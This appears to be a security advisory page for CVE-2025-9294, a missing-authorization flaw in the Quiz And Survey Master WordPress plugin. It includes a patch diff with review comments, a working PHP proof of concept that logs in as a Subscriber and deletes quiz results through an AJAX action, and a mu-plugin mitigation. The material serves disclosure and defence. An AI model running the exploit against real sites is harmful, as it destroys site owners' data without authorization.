 			"buy_btn_text" => __( 'Buy Webhooks Addon', 'quiz-master-next' ),
@@ -1626,7 +1623,7 @@
 			}
 		}
 	} else {
-		wp_send_json_error( [ 'message' => __( 'Invalid nonce. Busted.', 'quiz-master-next' ) ] );
+		wp_send_json_error( array( 'message' => __( 'Invalid nonce. Busted.', 'quiz-master-next' ) ) );
         wp_die();
 	}
 }
@@ -1643,22 +1640,22 @@
 	if ( ! isset( $_POST['nonce'] ) ||
         ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['nonce'] ) ), 'qsm_remove_template' )
     ) {
-        wp_send_json_error( [ 'message' => __( 'Invalid nonce. Action not authorized.', 'quiz-master-next' ) ] );
+        wp_send_json_error( array( 'message' => __( 'Invalid nonce. Action not authorized.', 'quiz-master-next' ) ) );
         wp_die();
     }

     if ( ! isset( $_POST['id'] ) || ! absint( wp_unslash( $_POST['id'] ) ) ) {
-        wp_send_json_error( [ 'message' => __( 'Invalid template ID.', 'quiz-master-next' ) ] );
+        wp_send_json_error( array( 'message' => __( 'Invalid template ID.', 'quiz-master-next' ) ) );
         wp_die();
     }

     $template_id = absint( wp_unslash( $_POST['id'] ) );
     $table_name = $wpdb->prefix . 'mlw_quiz_output_templates';
-    $result = $wpdb->delete( $table_name, [ 'id' => $template_id ], [ '%d' ] );
+    $result = $wpdb->delete( $table_name, array( 'id' => $template_id ), array( '%d' ) );
     if ( $result ) {
-        wp_send_json_success( [ 'message' => __( 'Template removed successfully.', 'quiz-master-next' ) ] );
+        wp_send_json_success( array( 'message' => __( 'Template removed successfully.', 'quiz-master-next' ) ) );
     } else {
-        wp_send_json_error( [ 'message' => __( 'Failed to remove the template.', 'quiz-master-next' ) ] );
+        wp_send_json_error( array( 'message' => __( 'Failed to remove the template.', 'quiz-master-next' ) ) );
     }
     wp_die();
 }
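Review bot: between the qsm_remove_template nonce check and $wpdb->delete() there is no current_user_can() call in the visible lines, which is the same pattern this release fixes for result deletion. If no capability check precedes line 1643, add one before the nonce test so that any authenticated user holding a valid nonce cannot remove rows from mlw_quiz_output_templates. The wp_die() calls after each wp_send_json_* are redundant.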
@@ -1714,7 +1711,7 @@
 									</div>
 									<div class="qsm-<?php echo esc_attr( $type ); ?>-page-template-card-buttons">
 										<button class="qsm-<?php echo esc_attr( $type ); ?>-page-template-preview-button button button-secondary" data-indexid="<?php echo esc_html($key); ?>"><?php esc_html_e( 'Preview', 'quiz-master-next' ); ?></button>
-										<button class="qsm-<?php echo esc_attr( $type ); ?>-page-template-use-button button button-secondary" data-structure="default" data-indexid="<?php echo esc_html($key); ?>"><img class="qsm-common-svg-image-class" src="<?php echo esc_url(QSM_PLUGIN_URL . 'assets/download-line-blue.svg'); ?>" alt="download-line-blue.svg" /><?php esc_html_e( 'Insert', 'quiz-master-next' ); ?></button>
+										<button class="qsm-<?php echo esc_attr( $type ); ?>-page-template-use-button" data-structure="default" data-indexid="<?php echo esc_html($key); ?>"><img class="qsm-common-svg-image-class" src="<?php echo esc_url(QSM_PLUGIN_URL . 'assets/download-line-blue.svg'); ?>" alt="download-line-blue.svg" /><?php esc_html_e( 'Insert', 'quiz-master-next' ); ?></button>
 									</div>
 								</div>
 								<?php
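Review bot: data-indexid on both buttons is written with esc_html( $key ) inside an HTML attribute; use esc_attr( $key ), as the class attribute on the same line already does for $type. Also confirm that dropping "button button-secondary" from the Insert button only is intended, since the Preview button beside it keeps those classes.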
@@ -1781,9 +1778,9 @@
 }

 function qsm_get_plugin_status_by_path( $path ) {
-	if ( is_plugin_active($path) ) {
+	if ( is_plugin_active( $path ) ) {
 		return 'activated';
-	} elseif ( '' != $path && file_exists(WP_PLUGIN_DIR . '/' . $path) ) {
+	} elseif ( ! empty( $path ) && file_exists( WP_PLUGIN_DIR . '/' . $path ) ) {
 		return 'installed';
 	} else {
 		return 'not_installed';
@@ -1798,39 +1795,39 @@
  */
 function qsm_get_dependency_plugin_list() {
 	$qsm_admin_dd = qsm_get_parsing_script_data();
-	$all_addons = isset( $qsm_admin_dd['all_addons'] ) ? $qsm_admin_dd['all_addons'] : array();
+	$all_addons   = isset( $qsm_admin_dd['all_addons'] ) ? $qsm_admin_dd['all_addons'] : array();

 	$dependency_array = array();

 	foreach ( $all_addons as $key => $addon ) {
-		$path = $addon['path'] ?? '';
-		$addon_link          = qsm_get_utm_link( $addon['link'], 'result_or_email', 'templates', 'template_preview_' . sanitize_title( $addon['name'] ) );
-		$dependency_array[] = [
+		$path       = isset( $addon['path'] ) ? $addon['path'] : '';
+		$addon_link = qsm_get_utm_link( $addon['link'], 'result_or_email', 'templates', 'template_preview_' . sanitize_title( $addon['name'] ) );
+		$dependency_array[] = array(
 			'id'     => $addon['id'],
 			'name'   => $addon['name'],
 			'link'   => $addon_link,
-			'status' => qsm_get_plugin_status_by_path($path), // Use the common function
-		];
+			'status' => qsm_get_plugin_status_by_path( $path ), // Use the common function
+		);
 	}

 	return $dependency_array;
 }
 function qsm_create_theme_defaults_tab() {
 	global $mlwQuizMasterNext, $wpdb;
-    $themes = $wpdb->get_results( "SELECT * FROM {$wpdb->prefix}mlw_themes", ARRAY_A );
+	$themes = $wpdb->get_results( "SELECT * FROM {$wpdb->prefix}mlw_themes", ARRAY_A );
 	if ( empty( $themes ) ) {
 		return;
 	}
 	$active_themes   = $mlwQuizMasterNext->theme_settings->get_active_themes();

-	if ( empty($active_themes) ) {
+	if ( empty( $active_themes ) ) {
 		return;
 	}
 	$pro_themes = array( 'Fortune', 'Sigma', 'Pixel', 'Sapience', 'Breeze', 'Fragrance', 'Pool', 'Ivory' );

 	$has_pro_theme = false;
 	foreach ( $active_themes as $theme ) {
-		if ( in_array($theme['theme_name'], $pro_themes, true) ) {
+		if ( in_array( $theme['theme_name'], $pro_themes, true ) ) {
 			$has_pro_theme = true;
 			break;
 		}
--- a/quiz-master-next/php/admin/options-page-questions-tab.php
+++ b/quiz-master-next/php/admin/options-page-questions-tab.php
@@ -30,7 +30,7 @@
  */
 function qsm_options_questions_tab_content() {
 	global $wpdb, $mlwQuizMasterNext;
-	$quiz_data           = $wpdb->get_results( "SELECT quiz_id, quiz_name	FROM " . $wpdb->prefix . "mlw_quizzes WHERE deleted=0 ORDER BY quiz_id DESC" );
+	$quiz_data           = $wpdb->get_results( 'SELECT quiz_id, quiz_name	FROM ' . $wpdb->prefix . 'mlw_quizzes WHERE deleted=0 ORDER BY quiz_id DESC' );
 	$question_categories = $wpdb->get_results( "SELECT DISTINCT category FROM {$wpdb->prefix}mlw_questions", 'ARRAY_A' );
 	$enabled             = get_option( 'qsm_multiple_category_enabled' );

@@ -66,26 +66,26 @@
 			'questions'    => array(),
 		);
 		foreach ( $pages as $k => $val ) {
-			$qpage                   = isset( $db_qpages[ $k ] ) ? $db_qpages[ $k ] : $defaultQ

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-9294 - Quiz And Survey Master <= 10.3.1 - Missing Authorization to Authenticated (Subscriber+) Quiz Results Deletion

/**
 * Proof of Concept for CVE-2025-9294
 * Requires valid WordPress Subscriber credentials
 */

$target_url = 'https://vulnerable-site.com';
$username = 'subscriber_user';
$password = 'subscriber_pass';
$result_id = 123; // Target quiz result ID to delete

// Initialize cURL session for WordPress login
$ch = curl_init();

// Step 1: Authenticate to WordPress and obtain cookies
$login_url = $target_url . '/wp-login.php';
$login_fields = [
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
];

curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_fields));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

$response = curl_exec($ch);

// Step 2: Exploit the vulnerable AJAX endpoint
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$exploit_fields = [
    'action' => 'qsm_dashboard_delete_result',
    'result_id' => $result_id
];

curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_fields));

$ajax_response = curl_exec($ch);

// Check if exploitation succeeded
if (strpos($ajax_response, 'success') !== false || strpos($ajax_response, 'deleted') !== false) {
    echo "[+] Successfully deleted quiz result ID: $result_id\n";
    echo "[+] Response: $ajax_response\n";
} else {
    echo "[-] Exploitation failed or result already deleted\n";
    echo "[-] Response: $ajax_response\n";
}

curl_close($ch);

// Clean up cookie file
if (file_exists('cookies.txt')) {
    unlink('cookies.txt');
}
?>
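
Interim mitigation for sites that cannot yet update to 10.3.2, as an added example (not code from Quiz And Survey Master or from Atomic Edge): a must-use plugin that puts an authorization check in front of the `qsm_dashboard_delete_result` AJAX action. The function name and log message are hypothetical, and the example assumes the plugin registers its own handler at a priority later than 0.

```php
<?php
/**
 * Plugin Name: QSM result-deletion guard (added example, not part of Quiz And Survey Master)
 *
 * Place in wp-content/mu-plugins/. Runs ahead of the plugin's own
 * wp_ajax_qsm_dashboard_delete_result handler and stops the request unless
 * the caller passes the same check the 10.3.2 patch applies to the
 * dashboard delete link.
 */

if ( ! defined( 'ABSPATH' ) ) {
	exit; // Only load inside WordPress.
}

/**
 * Reject result-deletion requests from non-administrators.
 * Function name is hypothetical; the action name comes from the advisory.
 */
function example_qsm_guard_delete_result() {
	if ( current_user_can( 'administrator' ) ) {
		return; // Authorized: let the plugin's later-priority handler run.
	}

	// Record the blocked attempt so it can be reviewed later.
	$result_id = isset( $_POST['result_id'] ) ? absint( wp_unslash( $_POST['result_id'] ) ) : 0;
	error_log(
		sprintf(
			'Blocked qsm_dashboard_delete_result: user_id=%d result_id=%d',
			get_current_user_id(),
			$result_id
		)
	);

	// Sends a JSON error with HTTP 403 and terminates the request,
	// so the deletion handler never executes.
	wp_send_json_error( array( 'message' => 'Not allowed.' ), 403 );
}

// Assumption: the plugin's handler uses the default priority (10) or later.
add_action( 'wp_ajax_qsm_dashboard_delete_result', 'example_qsm_guard_delete_result', 0 );
```

The log entries this guard writes also give a simple signal for spotting Subscriber-level accounts probing the endpoint.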
